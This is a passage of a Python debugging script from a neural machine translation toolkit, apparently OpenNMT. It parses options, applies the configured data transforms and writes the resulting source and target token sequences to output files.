file\")\n parser.add('--mono', '-mono', default=None, help=\"Monolingual input file\")\n parser.add('--src_output', '-src_output', required=True, help=\"Source output file\")\n parser.add('--tgt_output', '-tgt_output', required=True, help=\"Target output file\")\n parser.add('--is_valid', '-is_valid',\n help=\"Preprocess in validation mode (instead of train)\")\n\n group = parser.add_argument_group('Logging')\n group.add('--verbose', '-verbose', action=\"store_true\",\n help='Print scores and predictions for each sentence')\n group.add('--log_file', '-log_file', type=str, default=\"\",\n help=\"Output logs to a file under this path.\")\n group.add('--log_file_level', '-log_file_level', type=str,\n action=opts.StoreLoggingLevelAction,\n choices=opts.StoreLoggingLevelAction.CHOICES,\n default=\"0\")\n\n return parser\n\n\ndef process(opt):\n logger = init_logger(opt.log_file)\n assert opt.data_config is not None\n if opt.mono is not None:\n assert all(x is None for x in (opt.src, opt.tgt))\n files = [opt.mono]\n else:\n files = [opt.src, opt.tgt]\n\n transforms_from_task = opt.transforms_from_task\n data_config = read_data_config(opt.data_config)\n verify_shard_config(data_config)\n transform_models, transforms = load_transforms(data_config)\n set_train_opts(data_config, transforms)\n fields = load_fields(data_config)\n task_transforms = transforms[transforms_from_task]\n with open(opt.src_output, 'w') as src_out, \\\n open(opt.tgt_output, 'w') as tgt_out:\n for tpl in yield_debug(files, transforms_from_task, task_transforms, is_train=not opt.is_valid):\n src, tgt, idx = tpl\n print(' '.join(src), file=src_out)\n print(' '.join(tgt), file=tgt_out)\n\n\ndef main():\n parser = _get_parser()\n\n opt = parser.parse_args()\n process(opt)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"onmt/bin/debug_dynamicdata.py","file_name":"debug_dynamicdata.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}